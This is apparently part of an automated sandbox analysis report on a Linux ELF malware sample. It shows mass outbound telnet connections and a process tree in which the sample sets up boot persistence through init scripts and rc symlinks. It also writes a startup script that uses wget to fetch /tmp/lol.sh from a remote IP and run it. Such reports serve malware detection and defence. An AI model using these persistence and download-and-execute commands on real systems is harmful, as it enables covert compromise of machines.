Dec 5, 2024 08:02:49.957230091 CET	46082	23	192.168.2.23	211.200.199.151
Dec 5, 2024 08:02:49.957230091 CET	58544	23	192.168.2.23	1.126.222.164
Dec 5, 2024 08:02:49.957251072 CET	52390	23	192.168.2.23	172.175.32.64
Dec 5, 2024 08:02:49.957277060 CET	23	41972	163.146.76.9	192.168.2.23
Dec 5, 2024 08:02:49.957287073 CET	23	52608	9.237.213.78	192.168.2.23
Dec 5, 2024 08:02:49.957295895 CET	23	59374	133.202.32.185	192.168.2.23
Dec 5, 2024 08:02:49.957314014 CET	41972	23	192.168.2.23	163.146.76.9
Dec 5, 2024 08:02:49.957314968 CET	23	42396	193.84.59.198	192.168.2.23
Dec 5, 2024 08:02:49.957324982 CET	52608	23	192.168.2.23	9.237.213.78
Dec 5, 2024 08:02:49.957326889 CET	23	46742	216.240.251.4	192.168.2.23
Dec 5, 2024 08:02:49.957330942 CET	59374	23	192.168.2.23	133.202.32.185
Dec 5, 2024 08:02:49.957345009 CET	42396	23	192.168.2.23	193.84.59.198
Dec 5, 2024 08:02:49.957356930 CET	46742	23	192.168.2.23	216.240.251.4
Dec 5, 2024 08:02:49.957386971 CET	23	60376	81.97.1.51	192.168.2.23
Dec 5, 2024 08:02:49.957397938 CET	23	41980	130.250.11.206	192.168.2.23
Dec 5, 2024 08:02:49.957406998 CET	23	47284	55.48.154.119	192.168.2.23
Dec 5, 2024 08:02:49.957418919 CET	23	51726	49.131.105.123	192.168.2.23
Dec 5, 2024 08:02:49.957425117 CET	47284	23	192.168.2.23	55.48.154.119
Dec 5, 2024 08:02:49.957427979 CET	60376	23	192.168.2.23	81.97.1.51
Dec 5, 2024 08:02:49.957431078 CET	41980	23	192.168.2.23	130.250.11.206
Dec 5, 2024 08:02:49.957448006 CET	23	60628	143.191.157.249	192.168.2.23
Dec 5, 2024 08:02:49.957449913 CET	51726	23	192.168.2.23	49.131.105.123
Dec 5, 2024 08:02:49.957458973 CET	23	51448	194.145.118.247	192.168.2.23
Dec 5, 2024 08:02:49.957487106 CET	60628	23	192.168.2.23	143.191.157.249
Dec 5, 2024 08:02:49.957499981 CET	51448	23	192.168.2.23	194.145.118.247
Dec 5, 2024 08:02:49.957516909 CET	23	54454	77.219.167.39	192.168.2.23
Dec 5, 2024 08:02:49.957528114 CET	23	58188	5.102.186.168	192.168.2.23
Dec 5, 2024 08:02:49.957551003 CET	58188	23	192.168.2.23	5.102.186.168
Dec 5, 2024 08:02:49.957606077 CET	54454	23	192.168.2.23	77.219.167.39
Dec 5, 2024 08:02:49.957928896 CET	23	49320	47.159.109.247	192.168.2.23
Dec 5, 2024 08:02:49.957940102 CET	23	57664	52.160.229.236	192.168.2.23
Dec 5, 2024 08:02:49.957966089 CET	49320	23	192.168.2.23	47.159.109.247
Dec 5, 2024 08:02:49.957971096 CET	57664	23	192.168.2.23	52.160.229.236
Dec 5, 2024 08:02:49.957976103 CET	23	42524	141.22.216.117	192.168.2.23
Dec 5, 2024 08:02:49.957988977 CET	23	52136	93.69.61.87	192.168.2.23
Dec 5, 2024 08:02:49.958019972 CET	52136	23	192.168.2.23	93.69.61.87
Dec 5, 2024 08:02:49.958029032 CET	42524	23	192.168.2.23	141.22.216.117
Dec 5, 2024 08:02:49.958031893 CET	23	51750	62.163.203.230	192.168.2.23
Dec 5, 2024 08:02:49.958062887 CET	23	56508	96.222.218.77	192.168.2.23
Dec 5, 2024 08:02:49.958072901 CET	51750	23	192.168.2.23	62.163.203.230
Dec 5, 2024 08:02:49.958092928 CET	56508	23	192.168.2.23	96.222.218.77
Dec 5, 2024 08:02:49.958098888 CET	23	49436	68.217.169.32	192.168.2.23
Dec 5, 2024 08:02:49.958115101 CET	23	59952	152.47.87.165	192.168.2.23
Dec 5, 2024 08:02:49.958127975 CET	49436	23	192.168.2.23	68.217.169.32
Dec 5, 2024 08:02:49.958138943 CET	23	38612	183.56.68.202	192.168.2.23
Dec 5, 2024 08:02:49.958148956 CET	23	47246	11.28.221.113	192.168.2.23
Dec 5, 2024 08:02:49.958169937 CET	38612	23	192.168.2.23	183.56.68.202
Dec 5, 2024 08:02:49.958175898 CET	59952	23	192.168.2.23	152.47.87.165
Dec 5, 2024 08:02:49.958178997 CET	47246	23	192.168.2.23	11.28.221.113
Dec 5, 2024 08:02:49.958194971 CET	23	55610	93.245.89.62	192.168.2.23
Dec 5, 2024 08:02:49.958205938 CET	23	46988	11.186.51.13	192.168.2.23
Dec 5, 2024 08:02:49.958225012 CET	55610	23	192.168.2.23	93.245.89.62
Dec 5, 2024 08:02:49.958235025 CET	46988	23	192.168.2.23	11.186.51.13
Dec 5, 2024 08:02:49.958236933 CET	23	36796	59.194.179.68	192.168.2.23
Dec 5, 2024 08:02:49.958246946 CET	23	60346	178.158.63.197	192.168.2.23
Dec 5, 2024 08:02:49.958273888 CET	60346	23	192.168.2.23	178.158.63.197
Dec 5, 2024 08:02:49.958273888 CET	36796	23	192.168.2.23	59.194.179.68
Dec 5, 2024 08:02:49.958287001 CET	23	45918	194.77.207.106	192.168.2.23
Dec 5, 2024 08:02:49.958297968 CET	23	33226	199.188.249.152	192.168.2.23
Dec 5, 2024 08:02:49.958314896 CET	23	55536	131.217.222.252	192.168.2.23
Dec 5, 2024 08:02:49.958323002 CET	45918	23	192.168.2.23	194.77.207.106
Dec 5, 2024 08:02:49.958326101 CET	23	35880	108.189.48.62	192.168.2.23
Dec 5, 2024 08:02:49.958327055 CET	33226	23	192.168.2.23	199.188.249.152
Dec 5, 2024 08:02:49.958348989 CET	55536	23	192.168.2.23	131.217.222.252
Dec 5, 2024 08:02:49.958380938 CET	35880	23	192.168.2.23	108.189.48.62
Dec 5, 2024 08:02:49.958415031 CET	23	50020	14.234.225.230	192.168.2.23
Dec 5, 2024 08:02:49.958425045 CET	23	42886	35.200.152.187	192.168.2.23
Dec 5, 2024 08:02:49.958435059 CET	23	44718	144.33.193.131	192.168.2.23
Dec 5, 2024 08:02:49.958445072 CET	23	60612	158.38.111.112	192.168.2.23
Dec 5, 2024 08:02:49.958451033 CET	50020	23	192.168.2.23	14.234.225.230
Dec 5, 2024 08:02:49.958451986 CET	42886	23	192.168.2.23	35.200.152.187
Dec 5, 2024 08:02:49.958458900 CET	44718	23	192.168.2.23	144.33.193.131
Dec 5, 2024 08:02:49.958479881 CET	60612	23	192.168.2.23	158.38.111.112
Dec 5, 2024 08:02:49.958627939 CET	23	41828	61.210.73.254	192.168.2.23
Dec 5, 2024 08:02:49.958664894 CET	41828	23	192.168.2.23	61.210.73.254
Dec 5, 2024 08:02:49.958684921 CET	23	51512	179.239.7.19	192.168.2.23
Dec 5, 2024 08:02:49.958698034 CET	23	46750	111.113.16.140	192.168.2.23
Dec 5, 2024 08:02:49.958719015 CET	51512	23	192.168.2.23	179.239.7.19
Dec 5, 2024 08:02:49.958726883 CET	46750	23	192.168.2.23	111.113.16.140
Dec 5, 2024 08:02:49.958750010 CET	23	43784	78.107.223.24	192.168.2.23
Dec 5, 2024 08:02:49.958761930 CET	23	53560	115.88.21.255	192.168.2.23
Dec 5, 2024 08:02:49.958785057 CET	43784	23	192.168.2.23	78.107.223.24
Dec 5, 2024 08:02:49.958790064 CET	23	40298	106.54.203.113	192.168.2.23
Dec 5, 2024 08:02:49.958801031 CET	23	38100	70.185.114.58	192.168.2.23
Dec 5, 2024 08:02:49.958811045 CET	23	54176	156.60.17.48	192.168.2.23
Dec 5, 2024 08:02:49.958813906 CET	53560	23	192.168.2.23	115.88.21.255
Dec 5, 2024 08:02:49.958825111 CET	40298	23	192.168.2.23	106.54.203.113
Dec 5, 2024 08:02:49.958825111 CET	38100	23	192.168.2.23	70.185.114.58
Dec 5, 2024 08:02:49.958828926 CET	23	37202	106.162.255.130	192.168.2.23
Dec 5, 2024 08:02:49.958841085 CET	23	45766	44.232.218.63	192.168.2.23
Dec 5, 2024 08:02:49.958842039 CET	54176	23	192.168.2.23	156.60.17.48
Dec 5, 2024 08:02:49.958861113 CET	37202	23	192.168.2.23	106.162.255.130
Dec 5, 2024 08:02:49.958863020 CET	45766	23	192.168.2.23	44.232.218.63
Dec 5, 2024 08:02:49.958863974 CET	23	58068	126.235.65.123	192.168.2.23
Dec 5, 2024 08:02:49.958930969 CET	58068	23	192.168.2.23	126.235.65.123
Dec 5, 2024 08:02:50.008491993 CET	199	38976	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:50.046386957 CET	199	39380	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:50.047422886 CET	39380	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:50.059973955 CET	199	38976	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:50.073259115 CET	39380	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:50.193043947 CET	199	39380	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:50.193099976 CET	39380	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:50.962275028 CET	43928	443	192.168.2.23	91.189.91.42
Dec 5, 2024 08:02:51.289403915 CET	199	38964	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.289480925 CET	38964	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:51.413733959 CET	199	38966	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.413793087 CET	38966	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:51.539777994 CET	199	38968	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.539833069 CET	38968	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:51.679809093 CET	199	38970	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.679868937 CET	38970	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:51.836200953 CET	199	38972	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.836258888 CET	38972	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:51.976916075 CET	199	38974	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:51.976978064 CET	38974	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:52.101205111 CET	199	38976	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:52.101317883 CET	38976	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:56.593481064 CET	42836	443	192.168.2.23	91.189.91.43
Dec 5, 2024 08:02:58.129261971 CET	42516	80	192.168.2.23	109.202.202.202
Dec 5, 2024 08:03:10.927475929 CET	43928	443	192.168.2.23	91.189.91.42
Dec 5, 2024 08:03:23.213746071 CET	42836	443	192.168.2.23	91.189.91.43
Dec 5, 2024 08:03:29.356878996 CET	42516	80	192.168.2.23	109.202.202.202
Dec 5, 2024 08:03:51.881733894 CET	43928	443	192.168.2.23	91.189.91.42

System Behavior

Analysis Process: x86_32.nn.elf PID: 6232, Parent PID: 6157

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	/tmp/x86_32.nn.elf
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6241, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6242, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6267, Parent PID: 6242

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6267, Parent PID: 6242

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6307, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6307, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6308, Parent PID: 6307

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6308, Parent PID: 6307

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6309, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6309, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6310, Parent PID: 6309

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6310, Parent PID: 6309

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6313, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6313, Parent PID: 6232

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6315, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6315, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6316, Parent PID: 6315

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6316, Parent PID: 6315

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6329, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6329, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6330, Parent PID: 6329

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: mkdir PID: 6330, Parent PID: 6329

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6331, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: sh PID: 6331, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6332, Parent PID: 6331

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6332, Parent PID: 6331

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh /etc/rc.d/S99sh
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6335, Parent PID: 6232

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6337, Parent PID: 6335

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6338, Parent PID: 6335

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6339, Parent PID: 6335

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	95984 bytes
MD5 hash:	c32c3d338238953b22589c540fd85e64

Chronological Activities

Analysis Process: udisksd PID: 6244, Parent PID: 799

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6244, Parent PID: 799

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6275, Parent PID: 799

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6275, Parent PID: 799

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 6280, Parent PID: 6278

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6280, Parent PID: 6278

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 6292, Parent PID: 1477

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 6292, Parent PID: 1477

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-housekeeping PID: 6292, Parent PID: 1477

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/libexec/gsd-housekeeping
Arguments:	/usr/libexec/gsd-housekeeping
File size:	51840 bytes
MD5 hash:	b55f3394a84976ddb92a2915e5d76914

Chronological Activities

Analysis Process: dash PID: 6311, Parent PID: 4331

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6311, Parent PID: 4331

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dash PID: 6314, Parent PID: 4331

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6314, Parent PID: 4331

General

Start time (UTC):	07:02:48
Start date (UTC):	05/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: gdm3 PID: 6333, Parent PID: 1320

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6333, Parent PID: 1320

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 6334, Parent PID: 1320

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6334, Parent PID: 1320

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: udisksd PID: 6344, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6344, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6419, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6419, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6422, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6422, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6424, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6424, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6425, Parent PID: 799

General

Start time (UTC):	07:02:49
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6425, Parent PID: 799

General

Start time (UTC):	07:02:50
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6426, Parent PID: 799

General

Start time (UTC):	07:02:50
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6426, Parent PID: 799

General

Start time (UTC):	07:02:50
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6427, Parent PID: 799

General

Start time (UTC):	07:02:50
Start date (UTC):	05/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6427, Parent PID: 799

General

Start time (UTC):	07:02:50
Start date (UTC):	05/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
